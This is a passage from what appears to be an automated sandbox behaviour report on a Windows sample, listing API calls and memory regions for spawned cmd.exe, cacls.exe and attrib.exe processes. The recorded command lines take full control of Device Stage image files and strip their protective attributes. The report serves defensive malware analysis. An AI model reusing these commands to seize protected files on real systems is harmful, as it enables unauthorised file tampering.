returned 1 [0148.986] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0149.038] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f354 | out: lpExitCode=0x30f354*=0x0) returned 1 [0149.038] CloseHandle (hObject=0x50) returned 1 [0149.038] _vsnwprintf (in: _Buffer=0x30f49c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f360 | out: _Buffer="00000000") returned 8 [0149.038] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.038] GetEnvironmentStringsW () returned 0x422300* [0149.038] FreeEnvironmentStringsW (penv=0x422300) returned 1 [0149.038] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.039] GetEnvironmentStringsW () returned 0x422300* [0149.039] FreeEnvironmentStringsW (penv=0x422300) returned 1 [0149.039] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f3b8 | out: lpAttributeList=0x30f3b8) [0149.039] GetConsoleTitleW (in: lpConsoleTitle=0x30f79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.039] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.039] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.039] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0149.040] GetLastError () returned 0x2 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0149.040] GetLastError () returned 0x2 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x41e540 [0149.040] FindClose (in: hFindFile=0x41e540 | out: hFindFile=0x41e540) returned 1 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0xffffffff [0149.040] GetLastError () returned 0x2 [0149.040] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f038) returned 0x41e540 [0149.040] FindClose (in: hFindFile=0x41e540 | out: hFindFile=0x41e540) returned 1 [0149.040] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.040] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.040] GetConsoleTitleW (in: lpConsoleTitle=0x30f530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.041] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f3b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f480 | out: lpAttributeList=0x30f3b8, lpSize=0x30f480) returned 1 [0149.041] UpdateProcThreadAttribute (in: lpAttributeList=0x30f3b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f478, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f3b8, lpPreviousValue=0x0) returned 1 [0149.041] GetStartupInfoW (in: lpStartupInfo=0x30f374 | out: lpStartupInfo=0x30f374*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.041] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.041] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f414*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f460 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessInformation=0x30f460*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb20, dwThreadId=0xafc)) returned 1 [0149.042] CloseHandle (hObject=0x50) returned 1 [0149.042] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.042] GetEnvironmentStringsW () returned 0x422460* [0149.042] FreeEnvironmentStringsW (penv=0x422460) returned 1 [0149.043] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0149.084] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f354 | out: lpExitCode=0x30f354*=0x0) returned 1 [0149.084] CloseHandle (hObject=0x4c) returned 1 [0149.084] _vsnwprintf (in: _Buffer=0x30f49c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f360 | out: _Buffer="00000000") returned 8 [0149.084] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.084] GetEnvironmentStringsW () returned 0x422460* [0149.084] FreeEnvironmentStringsW (penv=0x422460) returned 1 [0149.084] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.084] GetEnvironmentStringsW () returned 0x422460* [0149.084] FreeEnvironmentStringsW (penv=0x422460) returned 1 [0149.084] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f3b8 | out: lpAttributeList=0x30f3b8) [0149.084] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.084] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.084] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.084] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.085] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.085] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.085] SetConsoleInputExeNameW () returned 0x1 [0149.085] GetConsoleOutputCP () returned 0x1b5 [0149.085] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.085] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.085] exit (_Code=0) Process: id = "225" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167a0" os_pid = "0xc00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "224" os_parent_pid = "0xb00" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18995 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18996 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18997 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18998 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 18999 start_va = 0x690000 end_va = 0x698fff entry_point = 0x690000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 19000 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19001 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19002 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19003 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19004 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19005 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19006 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19007 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19008 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 19009 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 19010 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19011 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19012 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19013 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19014 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19015 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19016 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 285 os_tid = 0xb7c Thread: id = 286 os_tid = 0xb6c Process: id = "226" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xb20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "224" os_parent_pid = "0xb00" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19017 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19018 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19019 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19020 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 19021 start_va = 0x320000 end_va = 0x326fff entry_point = 0x320000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19022 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19023 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19024 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19025 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19026 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19027 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19028 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19029 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 19030 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19031 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 19032 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19033 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19034 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19035 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19036 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19037 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19038 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19039 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19040 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19041 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19042 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19043 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19044 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 19045 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19046 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 287 os_tid = 0xafc Process: id = "227" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xc10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19047 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19048 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19049 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19050 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 19051 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19052 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19053 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19054 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19055 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19056 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19057 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19058 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19059 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 19060 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19061 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 19062 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19064 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19066 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19067 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19068 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19069 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19070 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19071 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 19072 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19073 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19074 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 19075 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 19076 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 19077 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 19078 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 19079 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 19080 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 19089 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 288 os_tid = 0x390 [0149.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fda4 | out: lpSystemTimeAsFileTime=0x14fda4*(dwLowDateTime=0x92d38f40, dwHighDateTime=0x1d440a9)) [0149.133] GetCurrentProcessId () returned 0xc10 [0149.133] GetCurrentThreadId () returned 0x390 [0149.133] GetTickCount () returned 0x2e37b [0149.133] QueryPerformanceCounter (in: lpPerformanceCount=0x14fd9c | out: lpPerformanceCount=0x14fd9c*=20592272459) returned 1 [0149.134] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0149.134] __set_app_type (_Type=0x1) [0149.134] __p__fmode () returned 0x76b331f4 [0149.134] __p__commode () returned 0x76b331fc [0149.134] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0149.134] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0149.134] GetCurrentThreadId () returned 0x390 [0149.135] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x390) returned 0x38 [0149.135] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.135] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0149.135] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.135] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.135] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fd34 | out: phkResult=0x14fd34*=0x0) returned 0x2 [0149.135] VirtualQuery (in: lpAddress=0x14fd6b, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x50000, 